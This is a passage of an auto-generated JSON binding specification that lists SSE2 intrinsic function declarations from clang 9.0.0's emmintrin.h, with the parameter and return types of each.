"/usr/lib/clang/9.0.0/include/emmintrin.h:2244:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_adds_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2265:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_adds_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2286:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_avg_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2306:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_avg_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2326:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_madd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2352:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_max_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2372:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_max_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2392:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_min_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2412:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_min_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2432:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mulhi_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2452:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mulhi_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2472:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mullo_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2492:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mul_su32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2511:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_mul_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2530:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sad_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2552:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sub_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2570:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sub_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2588:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sub_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2606:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sub_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2625:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m64" } }, { "tag": "function", "name": "_mm_sub_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2643:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_subs_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2664:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_subs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2685:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_subs_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2705:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_subs_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2725:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_and_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2743:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_andnot_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_or_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2780:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_xor_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2798:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_slli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2840:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sll_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2859:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_slli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2878:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sll_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2897:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_slli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2916:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sll_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2935:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srai_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2955:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sra_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2975:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srai_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:2995:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sra_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3015:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srli_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3057:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3076:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srli_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3095:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srli_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3133:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_srl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3152:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__count", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmpeq_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3171:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmpeq_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3190:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmpeq_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3209:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmpgt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3229:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmpgt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3252:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmpgt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3273:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmplt_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3294:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmplt_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3315:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmplt_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3336:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__b", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtsi64_sd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3360:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__b", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_cvtsd_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3378:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvttsd_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3396:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_cvtepi32_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3412:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_cvtps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3428:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvttps_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3445:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtsi32_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3461:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtsi64_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3478:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cvtsi128_si32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3496:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "function", "name": "_mm_cvtsi128_si64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3515:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__a", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "function", "name": "_mm_load_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3532:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_loadu_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3548:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_loadl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3569:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__p", "type": { "tag": ":pointer", "type": { "tag": "__m128i_u" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_undefined_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3587:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set_epi64x", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3609:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__q1", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "parameter", "name": "__q0", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3631:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__q1", "type": { "tag": "__m64" } }, { "tag": "parameter", "name": "__q0", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3659:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i3", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i2", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i1", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "parameter", "name": "__i0", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3699:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w7", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w6", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w5", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w4", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w3", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w2", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w1", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "parameter", "name": "__w0", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3747:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__b15", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b14", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b13", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b12", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b11", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b10", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b9", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b8", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b7", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b6", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b5", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b4", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b3", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b2", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b1", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "parameter", "name": "__b0", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set1_epi64x", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3766:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__q", "type": { "tag": ":long-long", "bit-size": 64, "bit-alignment": 64 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set1_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3785:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__q", "type": { "tag": "__m64" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set1_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3804:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__i", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_set1_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/emmintrin.h:3823:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__w", "type": { "tag": ":short", "bit-size": 16, 